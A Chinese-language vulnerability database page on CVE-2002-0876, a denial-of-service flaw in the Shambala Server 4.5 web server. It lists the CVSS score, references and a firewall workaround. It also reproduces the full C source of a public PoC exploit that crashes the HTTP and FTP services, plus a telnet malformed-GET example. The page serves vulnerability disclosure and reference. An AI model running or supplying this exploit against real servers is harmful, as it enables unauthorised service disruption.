CVE-2002-0876
CVSS5.0
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:11
NMCOES    

[原文]Web server for Shambala 4.5 allows remote attackers to cause a denial of service (crash) via a malformed HTTP request.


[CNNVD]Evolvable Shambala Server Web服务程序远程拒绝服务攻击漏洞(CNNVD-200210-045)

        
        Shambala Server是一款适合小型用户使用的FTP、Web、Chat集成的工具。
        Shambala Server的WEB服务对畸形请求存在漏洞,可导致远程攻击者进行拒绝服务攻击。
        通过连接80口提交不正常的GET请求,就可以导致Shambala Server的WEB服务崩溃,产生拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0876
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0876
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-045
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4897
(VENDOR_ADVISORY)  BID  4897
http://www.iss.net/security_center/static/9225.php
(VENDOR_ADVISORY)  XF  shambala-web-request-dos(9225)
http://online.securityfocus.com/archive/1/281265
(UNKNOWN)  BUGTRAQ  20020709 Exploit for previously reported DoS issues in Shambala Server 4.5
http://archives.neohapsis.com/archives/bugtraq/2002-05/0282.html
(UNKNOWN)  BUGTRAQ  20020530 [[ TH 026 Inc. ]] SA #3 - Shambala Server 4.5, Directory Traversal and DoS

- 漏洞信息

Evolvable Shambala Server Web服务程序远程拒绝服务攻击漏洞
中危 其他
2002-10-04 00:00:00 2006-08-24 00:00:00
远程  
        
        Shambala Server是一款适合小型用户使用的FTP、Web、Chat集成的工具。
        Shambala Server的WEB服务对畸形请求存在漏洞,可导致远程攻击者进行拒绝服务攻击。
        通过连接80口提交不正常的GET请求,就可以导致Shambala Server的WEB服务崩溃,产生拒绝服务攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在防火墙上设置对Evolvable Shambala Server Web的访问控制,只允许可信用户访问。
        厂商补丁:
        Evolvable
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.evolvable.com/estore/product.asp?sku=1

- 漏洞信息 (21498)

Evolvable Shambala Server 4.5 Web Server Denial Of Service Vulnerability (EDBID:21498)
windows dos
2002-05-31 Verified
0 Shambala
N/A [点击下载]
source: http://www.securityfocus.com/bid/4897/info

Shambala Server is a FTP, Web, and Chat server targeted for the Small Office/Home Office user.

It has been reported that Shambala Server's web server may be prone to a denial of service vulnerability. The denial of service condition is a result of the web server failing to handle malformed requests. 

/******** shambalax.c ***********************************************************

*                                                       			*

* PoC exploit for the DoS in Shambala Server 4.5        			*

* as described in Telhack 026 Inc. S.A. #3 (BID:4897).  			*

* I have also built in a function that exploits another 			*

* DoS condition found by zillion a long long time ago.  			*

* Also refined my DoS a little bit by just using one                            *

* char that mess up Shambala.                                                   *

*                                                       			*

* By: Daniel Nystr�m (excE) <exce@netwinder.nu>         			*

*                                                       			*

*                                                       			*

* Notes:                                                                        *

* I found that zillion had only been almost right, it                           * 

* is not opening a lot of TCP connection that generates                         *

* the DoS that he found, it is just one TCP connection,                         *

* but it certainly has to do with bad connection handling                       *

* by Shambala.                                                                  *

*                                                                               *

*                                                                               *

*                                                                               *

* Credits:                                                                      *

* Zillion <zillion@safemode.org> - for discovering the FTP DoS                  *

*                                                       			*

* Greetz:                                                                       *

* Xenogen <*****@**********.***> - for promising to report any segfaults :)     *

* X-Rewt  <*****@**********.***> - Cuz he's in my school :P                     *

* Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :))    *

*                                                                               *

*********************************************************** shambalax.c ********/



#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <string.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <netdb.h>

#include <sys/socket.h>





int main(int argc, char *argv[])

{

	int sockfd;

	int port;

	int numbytes;

	

	struct sockaddr_in target;

	struct hostent *he;



	if (argc != 3)

	{

		fprintf(stderr, "\n-- Shambala Server 4.5 DoS exploit --\n");

		fprintf(stderr, "\nUsage: %s <target> <type>", argv[0]);

		fprintf(stderr, "\nTypes:");

		fprintf(stderr, "\n1  -  HTTPD DoS");

		fprintf(stderr, "\n2  -  FTP DoS\n\n");

		exit(1);

	}

	

	printf("\n-- Shambala Server 4.5 DoS exploit --\n\n");

	printf("-> Starting...\n");	

	printf("->\n");



	if ((he=gethostbyname(argv[1])) == NULL)

	{

		herror("gethostbyname");

		exit(1);

	}



	if ((sockfd=socket(AF_INET, SOCK_STREAM,0)) == -1)

	{

		perror("socket");

		exit(1);

	}



	/* HTTPD DoS */

	if(argv[2][0] == '1')

	{

		port = 80;

		target.sin_family = AF_INET;

		target.sin_port = htons(port);

		target.sin_addr = *((struct in_addr *)he->h_addr);

		bzero(&(target.sin_zero), 8);

		printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr));

		printf("->\n");

		if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)

		{

			perror("connect");

			exit(1);

		}

		printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n");	

		printf("->\n");

		if(send(sockfd, "!\r\n", 3, 0) == -1)

		{

			perror("send");

			exit(1);

		}	

		close(sockfd);

	}

	else

	

	/* FTPD DoS */

	if(argv[2][0] == '2')

	{

                port = 21;

                target.sin_family = AF_INET;

                target.sin_port = htons(port);

                target.sin_addr = *((struct in_addr *)he->h_addr);

                bzero(&(target.sin_zero), 8);

                printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n", inet_ntoa(target.sin_addr));

                printf("->\n");

                if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)

                {

                        perror("connect");

                        exit(1);

                }

                close(sockfd);

	}

	else

	{

		fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n");

		exit(1);		

	}



	printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n", argv[1]);



}



/* EOF - Shambala Server 4.5 DoS exploit     */

/* Daniel Nystr�m (excE) <exce@netwinder.nu> */		

- 漏洞信息

8443
Evolvable Shambala Server Malformed HTTP GET Request DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

Shambala Server contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends a malformed GET request to the web server, which will crash the sever, resulting in a loss of availability.

- 时间线

2002-05-30 Unknow
2002-05-30 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Evolvable Shambala Server Web Server Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 4897
Yes No
2002-05-31 12:00:00 2009-07-11 01:56:00
Discovery credited to Daniel Nyström.

- 受影响的程序版本

Evolvable Shambala Server 4.5
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- 漏洞讨论

Shambala Server is a FTP, Web, and Chat server targeted for the Small Office/Home Office user.

It has been reported that Shambala Server's web server may be prone to a denial of service vulnerability. The denial of service condition is a result of the web server failing to handle malformed requests.

- 漏洞利用

The following proof of concept was provided by Daniel Nyström:

you# telnet 192.168.0.11 80
Trying 192.168.0.11...
Connected to 192.168.0.11.
Escape character is '^]'.
GET !"#&amp;#9788;%&amp;/()=?
Connection closed by foreign host.
you#

Daniel Nyström (excE) &lt;exce@netwinder.nu&gt; has also provided the following exploit:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站